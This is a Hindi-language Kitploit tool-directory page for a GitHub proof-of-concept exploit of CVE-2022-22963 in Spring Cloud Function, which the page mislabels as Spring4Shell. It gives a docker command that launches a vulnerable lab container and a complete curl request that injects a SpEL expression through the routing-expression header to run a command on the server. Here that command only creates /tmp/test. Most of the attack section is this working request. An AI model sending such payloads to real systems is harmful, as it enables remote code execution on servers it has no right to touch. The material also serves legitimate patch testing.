Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22963 — CVE-2022-22963 (Spring4Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें एक कमजोर Docker कंटेनर और Spring Cloud Function रूटिंग एक्सप्रेशन के माध्यम से curl-आधारित रिमोट कोड निष्पादन शामिल है। | Kitploit
उपकरण/GitHubGitHub/darryk10/cve-2022-22963
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubdarryk10/cve-2022-22963

CVE-2022-22963

CVE-2022-22963 (Spring4Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें एक कमजोर Docker कंटेनर और Spring Cloud Function रूटिंग एक्सप्रेशन के माध्यम से curl-आधारित रिमोट कोड निष्पादन शामिल है।

रिपॉजिटरी देखें
341624 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22963 - Spring4shell

कमजोर SpringBoot एप्लिकेशन चलाने के लिए इस डॉकर कंटेनर को पोर्ट 8080 पर एक्सपोज़ करते हुए चलाएं। उदाहरण:

root@kitploit:~
docker run -it -d -p 8080:8080 bobcheat/springboot-public

एक्सप्लॉइट

Curl कमांड:

root@kitploit:~
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

या Burp सूट का उपयोग करके:

Burpsuite

श्रेय

https://github.com/hktalent/spring-spel-0day-poc

टूल डाउनलोड करें